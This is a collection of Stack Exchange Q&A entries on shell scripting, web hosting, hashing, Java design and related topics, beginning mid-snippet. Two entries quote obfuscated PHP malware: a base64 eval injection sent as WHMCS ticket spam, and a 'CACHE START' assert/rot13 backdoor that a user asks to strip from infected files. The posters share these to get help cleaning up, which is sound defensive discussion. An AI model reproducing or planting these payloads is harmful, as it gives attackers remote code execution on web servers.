ByVal maxPoints As Integer, ByVal cesuur As Double) As Double Dim restPoints As Integer restPoints = maxPoints - points Dim restPass As Double restPass = mxPoints * (1 - cesuur) CalculatePassingGrade = MAXGRADE - restPoints * base / restPassEnd Function |
_unix.339093 | I have some Picture, that I want have in black and white.I'am in the right folder. -rw-r--r-- 1 alex alex 1027 Jan 21 13:07 target-0.jpg-rw-r--r-- 1 alex alex 1001 Jan 21 12:17 target-1.jpg-rw-r--r-- 1 alex alex 957 Jan 21 12:17 target-2.jpg-rw-r--r-- 1 alex alex 982 Jan 21 12:17 target-4.jpgWhy do this not work? for i in *.jpg ; do mogrify -monochrome ; doneNo errors, but no black and white Pictures. When I convert them single mogrify -monochrome target-0.jpg it works as expected. Version of imagemagickapt-cache policy imagemagickimagemagick: Installiert: 8:6.8.9.9-5+deb8u6 Installationskandidat: 8:6.8.9.9-5+deb8u6 Versionstabelle: *** 8:6.8.9.9-5+deb8u6 0 500 http://security.debian.org/ jessie/updates/main amd64 Packages 500 http://http.us.debian.org/debian/ jessie/main amd64 Packages 100 /var/lib/dpkg/statusAnd env | grep -i shellSHELL=/bin/bash | mogrify -monochrome to several Picture | bash;command line;imagemagick;image manipulation | You do not pass the variable i to your mogrify command in the for loop. It should be as follows.for i in *.jpg ; do mogrify -monochrome $i; done |
_unix.4840 | I run the following command:grep -o [0-9] errors verification_report_3.txt | awk '{print $1}'and I get the following result:1408I'd like to add each of the numbers up to a running count variable. Is there a magic one liner someone can help me build? | Adding numbers from the result of a grep | bash;shell;grep | grep -o [0-9] errors verification_report_3.txt | awk '{ SUM += $1} END { print SUM }'That doesn't print the list but does print the sum. If you want both the list and the sum, you can do:grep -o [0-9] errors verification_report_3.txt | awk '{ SUM += $1; print $1} END { print SUM }' |
_webapps.58069 | To legally reuse a CC image from Flickr, you must attribute properly the source and license, as explained on this blog: http://librarianbyday.net/2009/09/28/how-to-attribute-a-creative-commons-photo-from-flickr/ Another question about how to properly attribute was answered https://webapps.stackexchange.com/a/47595/19350Proper attribution involves many steps of linking info back to the source. The relative complexity of attribution seems to dissuade people from properly doing this (they will tend to just copy/paste the image and be done with it). Is there a tool or place on Flickr where I can copy/paste the attribution to a CC image such that I can simplify this process? I'm looking for a Copy image with attribution feature, that when you then paste, supplies all the information in various formats. Note that when I copy text from my Kindle reader on PC, the text will be pasted with a reference to the book and location (relative within). It's a smart copy/paste that sort-of does what I'm asking. Here's an example (I just selected a paragraph in the Kindle, did a copy, then pasted it here. The second part contains the attribution to the book.):Applying the Language To apply the patterns in this book to the solution of the example problem, first build a working pattern language for the project. The language will contain those elements of the fault tolerant vocabulary presented here that will be useful in the design of the system. Patterns are not included if they will clearly not be needed or useful.Hanmer, Robert (2013-07-12). Patterns for Fault Tolerant Software (Wiley Software Patterns Series) (Kindle Locations 4972-4975). Wiley. Kindle Edition. I'm looking for something similar, but with CC images on Flickr. | Is there a simple way to attribute a CC image on flickr? | images;flickr;copyright;copy paste | Imagecodr.org is mentioned in the OP's link to librarianbyday. Put a flickr URL and you get the following (it's possible to vary the format):<div about='http://farm3.static.flickr.com/2639/3979663993_90d928ba13_m.jpg'><a href='http://www.flickr.com/photos/umpcportal/3979663993/' target='_blank'><img xmlns:dct='http://purl.org/dc/terms/' href='http://purl.org/dc/dcmitype/StillImage' rel='dct:type' src='http://farm3.static.flickr.com/2639/3979663993_90d928ba13_m.jpg' alt='three device mobility by umpcportal.com, on Flickr' title='three device mobility by umpcportal.com, on Flickr' border='0'/></a><br/><a rel='license' href='http://creativecommons.org/licenses/by-nc-nd/2.0/' target='_blank'><img src='http://i.creativecommons.org/l/by-nc-nd/2.0/80x15.png' alt='Creative Commons Attribution-Noncommercial-No Derivative Works 2.0 Generic License' title='Creative Commons Attribution-Noncommercial-No Derivative Works 2.0 Generic License' border='0' align='left'></a> by <a href='http://www.flickr.com/people/umpcportal/' target='_blank'> </a><a xmlns:cc='http://creativecommons.org/ns#' rel='cc:attributionURL' property='cc:attributionName' href='http://www.flickr.com/people/umpcportal/' target='_blank'>umpcportal.com</a><a href='http://www.imagecodr.org/' target='_blank'> </a></div>which looks something likeNote that the name of the work displays when you hover over the image -- perhaps not the best solution. We don't see the Author's name (Steve Paine) in the metadata, although the link to umpcportal may be sufficient. |
_cs.80246 | Reversible programs with finite execution steps are well studied. For example, a Turing machine whose transitions are reversible and halts can be executed backwards consuming its tape in the reverse order. A variant of Turing machines with distinct input, output, and work tapes can be similarly executed in reverse to consume its output and regenerate its input, assuming it halted with an empty work tape in the forward execution (to avoid the possibility of stashing input information in the work tape).Is there any work for the equivallent concepts in the setting of interactive programs (in the spirit of https://en.wikipedia.org/wiki/Interactive_computation)? In the three-tape Turing machine model described, it is clearly possible to have infinite interactive runs consuming an infinite input stream and emitting an infinite output stream while storing intermediate results in the work tape. Some of these programs are clearly reversible in an analogous way to the finite programs, but cannot be covered by that formalism if they are non-halting. How can we characterize reversible interactive programs in this model? We need to exclude programs that simply stash away their input in the work tape, but unlike the finite case, we can't simply require that the program ends with an empty work tape.Is there any work on such reversible interactive programs? | How to model reversible interactive programs | turing machines;reference request;reversible computing | null |
_unix.385515 | In Nginx we can return a specific status code to URL prefix like this.location /api { return 200; }How can we achieve the same in Haproxy?. Gone through Haproxy ACL but couldn't find any. | Return a specific/200 status code for a particular URL prefix in Haproxy | linux;webserver;haproxy | null |
_unix.292607 | I am trying to understand how this piece of code works:for b in `git branch -r`; do git branch --track ${b##upstream/} $b; doneIn particular, the part where it does${b##upstream/}I know it cuts the characters upstream/ from $b, but I want to know how or why this works. I found this snippet on a forum. | for loop # usage | shell;variable | null |
_unix.194292 | I have a large directory with tons of files and subdirectories in it. Is there a way to recursively search through all of these files and subdirectories and print out a list of all files containing an underscore (_) in their file name? | Recursively list files containing an underscore in the file name | files;recursive | find . -name '*_*'Thanks to Stphane Chazelas as noted in the comments above! |
_computerscience.5443 | This link says iPhoneGLU says, this libraray supports below futures.Matrix manipulationPolygon tessellationI would like to know whether I can use this library to draw primitives(lines,points,triangles,simple polygon).Thank you. | iPhone GLU(OpenGL Utility Library) | opengl es | null |
_scicomp.7833 | I need to evaluate the following derivative:$$\frac{1}{\prod_i \xi_i!}\frac{1}{\prod_j \eta_j!}\left.\frac{\partial^{\xi_1 + \cdots + \xi_m}}{\partial\alpha_1^{\xi_1}\ldots\partial\alpha_m^{\xi_m}}\frac{\partial^{\eta_1 + \cdots + \eta_n}}{\partial\beta_1^{\eta_1}\ldots\partial\beta_n^{\eta_n}}\exp\left(\sum_{ij} a_{ij} \alpha_i \beta_j\right)\right|_{\alpha_1 = \cdots = \alpha_m = \beta_1 = \cdots = \beta_n = 0}$$where the $\xi_i$ and $\eta_j$ are non-negative integers, with $i = 1...m$ and $j = 1...n$, and the $a_{ij}$ are non-negative real numbers.Is there a good numerical algorithm to do this? Is it efficient?(See also: https://math.stackexchange.com/a/430925/10063) | Numerical evaluation of partial derivatives | algorithms | null |
_codereview.116967 | Type erasure is giving me nuts recently. I'm designing a class that performs symbolic differentiation on a math expression represented as a binary expression tree. The question is more on the design part than on the actual code part so I'm only giving out the method that looks awful to me.public Node derive(final Node currentNode, Node parentNode) { Node dxNode = null; final Object cDataContext = currentNode.getData(); if (Number.class.isAssignableFrom(cDataContext.getClass())) dxNode = new TreeNode<Double>(0.0); else if (AddOperator.class.isAssignableFrom(cDataContext.getClass())) dxNode = deriveAddContext((Node<AddOperator>) currentNode); else if (MulOperator.class.isAssignableFrom(cDataContext.getClass())) dxNode = deriveMulContext((Node<MulOperator>) currentNode); else if (SineFunction.class.isAssignableFrom(cDataContext.getClass())) dxNode = deriveSineContext((Node<SineFunction>) currentNode); if (dxNode != null && parentNode != null) dxNode.setParent(parentNode); return dxNode;}I think it already speaks for itself. I'm having methods with different names which is fine. The awful part at least for me is this huge if statement that I truncated for simplicity. Is there a better way of doing this? I mean I would love to live with dynamic dispatch having the whole derive method consisting of a simple:Node dxNode = deriveNode(currentNode);dxNode.setParent(parentNode);return dxNode;I guess Java won't give me this luxury so perhaps there is some design pattern that I can utilize here? Just to give you a better understanding of the algorithm I'll show a sample method:private Node<AddOperator> deriveAddContext(final Node<AddOperator> additionContext) { // d/dx [f(x) + g(x)] = d/dx [f(x)] + d/dx [g(x)] => d/dx [f(x)] d/dx [g(x)] + // ROOT: ADD Node<AddOperator> dRoot = new TreeNode<AddOperator>(new AddOperator()); // ROOT.LEFT: d/dx [f(x)] dRoot.setLeft(derive(additionContext.getLeft(), dRoot)); // ROOT.RIGHT: d/dx [g(x)] dRoot.setRight(derive(additionContext.getRight(), dRoot)); // RET: d/dx return dRoot;}So the whole algorithm is recursive on the expression traversing the original expr in an inorder fashion.A Node has the following structure: dataField: <DataType> leftChild: Node rightChild: Node parent: Node | Dynamic Dispatch replacement for Generic methods | java;object oriented;design patterns | Personally, I would be able to live with your huge if statement if it remains straightforward, is well tested, and hidden in a nice class. I think a parser will often have these types of structures, especially if you are generating it from a grammar using a tool (like ANTLR for example) instead of coding it by hand.You could slightly improve the huge if statement by factoring out currentNode.getData().getClass() (instead of currentNode.getData()):final Class<?> dataClass = currentNode.getData().getClass();if (Number.class.isAssignableFrom(dataClass)) dxNode = new TreeNode<Double>(0.0);else if (AddOperator.class.isAssignableFrom(dataClass)) dxNode = deriveAddContext((Node<AddOperator>) currentNode);else if (MulOperator.class.isAssignableFrom(dataClass)) dxNode = deriveMulContext((Node<MulOperator>) currentNode);else if (SineFunction.class.isAssignableFrom(dataClass)) dxNode = deriveSineContext((Node<SineFunction>) currentNode);You could also consider using Java 8 to create an explicit mapping between the class the current node (data) is assignable from and the initialization code for dxNode using lambda expressions. This has the advantage that you should be able to extend the expression types by adding a single line to the map:public Node deriveAlternative(final Node currentNode, final Node parentNode) { Node dxNode = null; final Map<Class<?>, Function<Node, Node>> deriveMap = new HashMap<>(); deriveMap.put(Number.class, n -> new TreeNode<Double>(0.0)); deriveMap.put(AddOperator.class, n -> deriveAddContext((Node<AddOperator>) n)); deriveMap.put(MulOperator.class, n -> deriveMulContext((Node<MulOperator>) n)); deriveMap.put(SineFunction.class, n -> deriveSineContext((Node<SineFunction>) n)); final Optional<Class<?>> optionalKey = deriveMap.keySet().stream() .filter(key -> key.isAssignableFrom(currentNode.getData().getClass())) .findFirst(); if (optionalKey.isPresent()) { final Class<?> key = optionalKey.get(); dxNode = deriveMap.get(key).apply(currentNode); } if (dxNode != null && parentNode != null) dxNode.setParent(parentNode); return dxNode;} |
_webmaster.26523 | I have WHMCS and I use it with no problem for my hosting purposes.Almost every 2 or 3 days, I can see a spam with malicious content submitted as a new ticket that tries to hack.The last one was:Subject:{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php})Message:{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php})What are these attacks? Why don't they use any other way to attack?!!!In my opinion it is obvious that a system like WHMCS will never be hacked by such a poor attempts. They should have of course used some functions like strip_tags and mysql_real_escape_string and other security functions.Would any body explain why do they always select such a poor way to attack? Don't they really know that WHMCS is stronger than these low level hacks?In fact I'd like to know that: Do these efforts differ from each other? Can they be serious? Should I be scared of these attempts? | Should WHMCS hacking attemps that never succeed be important to me? | php;server;security;hacking | It's a robot scanning the web for WHMCS installs that are vulnerable to this attack, it's just part and parcel of running a website. |
_unix.322912 | I have a server with thousands of files containing a multi-line pattern that I want to globally find & replace. Here's a sample of the pattern:<div class=fusion-header-sticky-height></div><div class=fusion-header> <div class=fusion-row> <?php avada_logo(); ?> <?php avada_main_menu(); ?> </div></div><?php//###=CACHE START=###@error_reporting(E_ALL);@ini_set(error_log,NULL);@ini_set(log_errors,0);@ini_set(display_errors, 0);@error_reporting(0);$wa = ASSERT_WARNING;@assert_options(ASSERT_ACTIVE, 1);@assert_options($wa, 0);@assert_options(ASSERT_QUIET_EVAL, 1);$strings = as; $strings .= se; $strings .= rt; $strings2 = st; $strings2 .= r_r; $strings2 .= ot13; $gbz = riny(.$strings2(base64_decode);$light = $strings2($gbz.'(nJLtXPScp3AyqPtxnJW2XFxtrlNtMKWlo3WspzIjo3W0nJ5aXQNcBjccMvtuMJ1jqUxbWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqXFxtrlOyL2uiVPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftsFOyoUAyVUfXWUIloPN9VPWbqUEjBv8ioT9uMUIjMTS0MKZhL29gY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhqKWfMJ5wo2EyXPEsH0IFIxIFJlWVISEDK1IGEIWsDHqSGyDvKFxhVvMcCGRznQ0vYz1xAFtvZwSxLGVkAwqzBJEvBTSwAwV4ZwLkMGp3AQyvLJH1ZwDkZFVcBjccMvuzqJ5wqTyioy9yrTymqUZbVzA1pzksnJ5cqPVcXFO7PvEwnPN9VTA1pzksnJ5cqPtxqKWfXGfXL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK0uSDHESHvjtExSZH0HcB2A1pzksp2I0o3O0XPEwqKWfYPOQIIWZG1OHK0ACGx5SD1EHFH1SG1IHYPN1XGftL3IloS9mMKEipUDbWTA1pzjfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfXL3IloS9woT9mMFtxL2tcBjc9VTIfp2IcMvucozysM2I0XPWuoTkiq191pzksMz9jMJ4vXFN9CFNkXFO7PvEcLaLtCFOznJkyK2qyqS9wo250MJ50pltxqKWfXGfXsDccMvucp3AyqPtxK1WSHIISH1EoVaNvKFxtWvLtoJD1XT1xAFtxK1WSHIISH1EoVaNvKFxcVQ09VPVkAwN0MwH5ZmxjZwp3ZGVlBGp1BJDjMQHkAGyzA2HkLvVcVUftMKMuoPumqUWcpUAfLKAbMKZbWS9FEISIEIAHJlWwVy0cXGftsDcyL2uiVPEcLaL7PtxWPK0tsD==));'); $strings($light);//###=CACHE END=###?>I've tried various methods to find and replace this string but its multiline nature has got me stumped. I've looked around extensively (over a day of searching) and the solutions I've found can't handle the multi-line nature of this.Any assistance would be most welcome.UPDATEI've got a solution now, largely thanks to the accepted answer. Others facing something similar should look at my github project for this. | Global multiline search & replace | sed;grep;filesystems;php;malware | If you want to edit text defined by a context-free language (nested matching begin and end tags, e.g. HTML or XML), you should use a tool made for that instead of a tool for regular expressions. Such a tool is for example sgrep (available as a package for many linux distros): You can match (nested) regions defined by beginning and ending tags, and manipulate them. So for examplesgrep -o '%r\n' '(start .. end) extracting (<?php..?> containing ###=CACHE START=###)'will remove any region starting with <?php and ending with ?> that contains ###=CACHE START=### from your file, by printing all other regions separated by a newline. Newlines and white space are not considered relevant for matching, so multiline matches are for free. |
_cs.31998 | I am doing an exercise from a Big Data course I'm taking on Coursera (this exercise is for experimenting with a big-data problem and is not for any credit or homework) , the assignment was described briefly:Your task is to quickly find the number of pairs of sentences that are at the word-level edit distance at most 1. Two sentences S1 and S2 they are at edit distance 1 if S1 can be transformed to S2 by: adding, removing or substituting a single word.I am then given a large txt file that contains about $10^6$ sentences.The way I tried to attack this problem:Observation $1$: If the length of two sentences is greater then $1$ then they are not at an edit distance $1$.Observation $2$: Let $A_1,...,A_5$ be five consecutive words from a sentences and let $B_1,...,B_5$ be another five consecutive words chosen from different indexes (that is if we label the words of a sentence then $B_i$ and $A_j$ does not share an index.Five is a small arbitrary number I choseI used something like a curried syntax to get a hashtable that keeps a 3-touple: $(X,Y,Z)$Where I mapped each sentence as follows:$X$ is the number of words the sentence have.$Y$ is obtained by a hash function on the content of the words (I will soon describe this hash function)$Z$ is a list of integers containing the index of the line in the document [the line number] that was mapped to $(X,Y)$In C# this corresponds to an object of a type Dictionary< int, Dictionary< int, List< int>>>So I kept two Hashtables of the above form, where I took the first five words to hash and get $Y$ and words $6-10$ to hash and get another value of $Y$.Then given a sentence - compute the two $Y$ values it would of gotten and look at buckets with length that differs at at most $1$ from this sentence length and share one $Y$ value this sentence.Let me describe the hashing function I used to get $Y$ -I took the $A_i$ (similarly with the $B_i$) and concatenated them I looked at this string as a byte array (that is by the bits that takes to represent the numbers) I then applied a the SHA-1 hash function on it (there are no security reasons for this but I wanted something that hashes well) I took the last $4$ bytes in the SHA-1 hash and I looked at it as a positive integer (by looking at the last $32$ bits and considering it as an integer then applying the absolute value function). Call this result $R$$Y= R\%p^{2}$where $p$ was chosen as follows: I counted how many lines of a given length $l$ appear (say $n_l$), for lines of length $l$ I chose $p$ s.t $$\frac{n_l}{p^2}\leq 3$$ the following is a Histogram showing $n_l$ as a function of $l$which should give some indication of the values chosen for $p$.However - There are too many collisions - I get about $6$ elements in each bucket.I took one example of such a bucket and I printed those sentences (I hoped they are similar so they would have a good reason to be mapped to the same bucket) by they are very different from one another. This is a printscreen of those sentences printed to the console.Question: Why do I get a large number of collisions ?($6$ in average on $10^5$ buckets I considered where if I had even distribution I would expect $3$ from the choice of $p$, some buckets have a few tens of elements in them) Could the problem be that I used modulo a square of a prime and not a prime ? is it that significant? | Hashing by doing modulo $m$ for $m=p^2$ for a prime $p$ instead of using a prime $m$ - is it that bad? | hash;big data | null |
_softwareengineering.318730 | I have a couple of simple classes that implement the Null Object pattern.To illustrate the hierarchy, let's define a Config interface with two classes implementing it ConfigItem and MissingConfig, each defined in its own file.// Config.javapublic interface Config { Something process();}// ConfigItem .javapublic class ConfigItem implements Config { // some fields @Override public Something process() { // some actual logic and return statement }}// MissingConfig.javapublic enum MissingConfig implements Config { INSTANCE; @Override public Something process() { // do no harm }}In my case, the MissingConfig object is immutable and only a single instance is guaranteed to exist.This works fine and allows me to avoid null-checks. However, the fact that this implementation of the Config interface exists can be missed by other developers working with the code.I'm trying to find a way to make the reusable null-representation of the Config easy to find.It occurred to me that I could expose it using the interface itself:public interface Config { Something process(); MISSING = MissingConfig.INSTANCE;}so that it would auto-complete for everyone trying to do something with ConfigThis, however, in a way, introduces a constant in the interface, which is advised against in Joshua Bloch's Effective Java (Chapter 4, item 19)Another way to structure the code that occurred to me is to define the enum inside the interface.public interface Config { Something process(); public enum Missing implements Config { INSTANCE; @Override public Something process() { // do no harm } }}This looks almost as readable when consumedConfig.Missing.INSTANCEbut not as nice as the previous version... and technically, this is still a constant defined inside an interface. Just a bit more convoluted.Is there any way I can make the consumption of the null-object blatantly obvious without violating the good practices of interface design... or am I trying to have my cake and eat it too?I'm beginning to think my original implementation (with the enum defined in its own file) is the most elegant one and that the discoverability should be achieved by an explicit mention of it in the Javadoc. As much as I'd love to, I can't protect myself against people who don't read javadocs.I have also thought about switching from an interface to an abstract class but that limits reuse in ways I cannot accept due to single inheritance (some existing code that has to do with the Config)Hope this isn't too open-ended for Programmers | Discoverable default implementation of an interface | java;interfaces | There is a sentence in the chapter you referenced (Joshua Bloch's Effective Java (Chapter 4, item 19)):If the constants are strongly tied to an existing class or interface, you should add them to the class or interface.and you could rewrite your examples to:public interface Config { Config EMPTY = new Config() { @Override public void doSomething() { // empty for missing config } }; void doSomething();}but some JAVADOC could be helpful for your colleagues. |
_softwareengineering.355376 | Suppose I am writing a C++ library that I intend to distribute in binary form, with interfaces from other languages (e.g. Python). The 'easy' approach of just compiling the library and distributing the DLL or Framework does not work well.For it to work you need to compile the library with every supported compiler and every supported compiler option, and bad things can happen if you don't.The problem is because C++'s ABI is in general not stable, and the ABI of the STL is definitely not stable. A sort of solution is to stick to 'simple' C++ in your public API - simple classes with basic types. The problem with that is you don't get to use the STL's nice types like std::string and `std::vector and end up reimplementing them.So I'm wondering if there is a better solution using a library Interface Definition Language (IDL). There are loads of these for network protocols, like Thrift, Protobuf, gRPC, CapnProto, etc. Is there one for libraries?The ideal solution would then take this IDL file, generate a C->C++ wrapper around the C++ library, so that its ABI is now the C ABI. It could then also generate open source wrappers around the C library for whatever language you wanted (including C++).I know it is kind of insane to wrap C++ with a C API and then wrap that with a C++ API. But I can't see a better way.Does this exist? Is it insane? Is there a better way? | Is there an interface definition language for software libraries? | c++;libraries;abi | null |
_webmaster.61101 | Google webmaster tools is showing keywords such as cookies in my keyword list. This is probably because we have links to our long legal disclaimer on cookies.We're a B2B service, so clearly I don't want my site to rank for cookies. What's the best practice to deal with this? Should I remove the domain.com/cookies subdir from google webmaster tools? | How to deal with non-relevant keywords in Google Webmaster Tools | seo;google search console;keywords;googlebot | null |
_webmaster.17980 | I run a forum which serves its pages as XHTML+MathML+SVG; in full:<!DOCTYPE html PUBLIC -//W3C//DTD XHTML 1.1 plus MathML 2.0 plus SVG 1.1//EN http://www.w3.org/2002/04/xhtml-math-svg/xhtml-math-svg-flat.dtd>Using the MathPlayer plugin, Internet Explorer users can use this site. However, sometimes someone is using the forum from IE and isn't able to install MathPlayer (maybe they're on a public machine somewhere). Then IE (at least 6&7) complains about the XHTML and offers just to download the file.I read on the w3c site how to get around this using an XSL transformation (http://www.w3.org/MarkUp/2004/xhtml-faq#ie). When I put this in place, I found that Chrome was now complaining vociferously about undefined entities (the specific one was but testing shows that that's not relevant).Bizarrely, I can get round this by manually declaring the entities in the DOCTYPE:<!DOCTYPE html PUBLIC -//W3C//DTD XHTML 1.1 plus MathML 2.0 plus SVG 1.1//EN http://www.w3.org/2002/04/xhtml-math-svg/xhtml-math-svg-flat.dtd [<!ENTITY nbsp  >]>but I'd rather not do this for the whole gamut of entities possible. I say bizarrely because the XHTML+MathML+SVG dtd does, as far as I can see, declare these entities. So somehow these are getting missed out.Is there a way around this problem? Can I serve XHTML-with-entities to IE?In case it matters, the pages are generated by a php script and are served via apache, so if there's a reliable method of sniffing the browser and modifying the start of the document (so only sending the <?xml-stylesheet ...> bit to IE) then that would be an acceptable alternative.(I hope I have the right SE site ... please let me know if I'm in the wrong place. Ditto with the tags.) | How do I serve XHTML to Internet Explorer without breaking Chrome? | internet explorer;xhtml | null |
_unix.114264 | In linux cli I can do ctrl-r and do a reverse search and choose something I have done easily.Is there something similar in vim? I mean I may run a command using : (could be anything like a long substitution) and if I need to do it again I need to retype it.Is there a way to avoid retyping but instead somehow search back and execute it? | Is there a command reverse search in vim? | vim;search | You may find q: useful. It opens the command-line window. The command-line window looks like this:I tried to make an animation of its usage:Also see c_CTRL-F, which opens the command-line window from command mode.You can also re-run the last command from normal mode by typing @:. |
_cs.65953 | I came across following excerpts while reading about regular expressions identities:The regex associative laws are: $$(L+M)+N=L+(M+N)$$ $$(LM)N=L(MN)$$ Some important implications out of associative laws are: $$r(sr)^*=(rs)^*r$$ $$(rs+r)^*r=r(sr+r)^*$$ $$s(rs+s)^*r=(sr+s)^*sr$$ $$(LM)^*N*\neq L*(MN)*$$The issue is that I don't find the implications much intuitive as the identities themselves are. How can I understand the implications intuitively? I can always form a strings belonging to left hand side regex and check whether it can be accepted by other regex. The first implication is very simple to test this way. However how can I make them more intuitive??Are these implications simply made up expressions which are tested rigorously to hold true and they don't have any specific expression as we can form many such expressions?I am unable to get the point behind stating these implications. I dont think of any problem in which I can use these regexes straight / immediately. It may be because I am not able to get intuition behind these implications so that it may strike in my head immediately when to use these implications. | Meaning / proof of these regex | regular expressions | For all three of your statements, the answer is that, generally speaking, the implications simply aren't as intuitive as, say, the associative laws. Look at the analogous problem with algebraic expressions: we have associative laws for addition and multiplication and we also have a distributive law that states that for any expressions $p,q,r$ we have $$p\cdot(q+r)=(p\cdot q)+(p\cdot r)$$Eventually, these rules should be intuitively obvious. However, one implication of these rules, that $$(p+q)^3=p^3+3p^2q+3pq^2+q^3$$is probably not as intuitively obvious as the rules used to derive that identity. The utility of the result above is that it can be used as a tool to simplify other more complicated problems.It's the same for regular expressions: the fact that, say, $r(sr)^*=(rs)^*r$, is correct can be proven rigorously, but having done that you can use it as a tool to show that $$aa+(aab)^*aa=aa+aa(baa)^*=aa(\epsilon+(baa)^*)$$should you ever need to. For example, there is a handy technique, involving what's known as Arden's lemma that can be used to produce a regular expression describing the language accepted by a finite automaton. Depending on how it's applied, this can produce several regular expressions from the same FA, so it might fall to you to show that the expressions are indeed equivalent, in which case the implications you listed might be handy.The upshot (here's the tl;dr part), is that the implications you mentioned are simply tools you can use when needed: they've beed proven to hold, but there's no reason why they should be intuitively obvious. |
_unix.175289 | I want to install windows 10 64 bit but the my current verson of windows is 32 bit so it is unable to run the setup.exe file so booted into ubuntu 14.10 64 bit and installed qemu to use my current harddisk as virtual harddisk and the iso cdrom. This is the command I usesudo qemu-system-x86_64 -cpu qemu64 -vga std -cdrom file=~/WindowsTechnicalPreview-x64-EN-US.iso -boot d -drive /dev/sda1But this gives me errorqemu-system-x86_64: -cdrom file=/home/ubuntu/WindowsTechnicalPreview-x64-EN-US.iso: could not open disk image file=/home/ubuntu/WindowsTechnicalPreview-x64-EN-US.iso: Could not open 'file=/home/ubuntu/WindowsTechnicalPreview-x64-EN-US.iso': No such file or directoryBut I have checked the file exists | Geting error in qemu No such file or directory | qemu | -cdrom SOMEFILE is a shortcut for -drive index=2,media=cdrom,file=SOMEFILE. Either use the verbose -drive option or the -cdrom shortcut, don't mix them up. You've told Qemu to open a file called file=/home/ubuntu/WindowsTechnicalPreview-x64-EN-US.iso', and this file doesn't exist. |
_webapps.91905 | How do I import saved images from http://www.google.com/save/ into Google Photos without downloading them?(From Linux.)Similar to, but different from:How to download all Google Search images resultsexample: | export saved Google images into Google photos | images;google photos;online storage;google image search;cloud | null |
_unix.174323 | I have a Ubuntu machine. I am connected to it remotely and getting the following errer:mkdir: cannot create directory `/testFolder': Read-only file systemLIKE WINDOWS, REBOOTING the machine solved this error.Can someone explain this behaviour to me. I am bit surprised. | Read-only file system error while accessing the files on Ubuntu | ubuntu;filesystems;readonly | null |
_unix.315239 | I have a string like $number=1234567;and i want to extract substring out of it , but i am not getting proper results with substr function.If i execute substr $number ,0,1 ;i get 1 as output but it should be 12. | best way to find substring of integer number in perl | perl;string | To get 12, you need:substr $number, 0, 2The syntax for substr is:substr $var, OFFSET, LENGTHSo when you do:substr $number ,0,1the OFFSET will be 0 and LENGTH will be 1.perl is zero-indexed i.e. the indexing starts at 0, and the length of the substring you have picked is 1, so you would only get 1 in the output expectedly. |
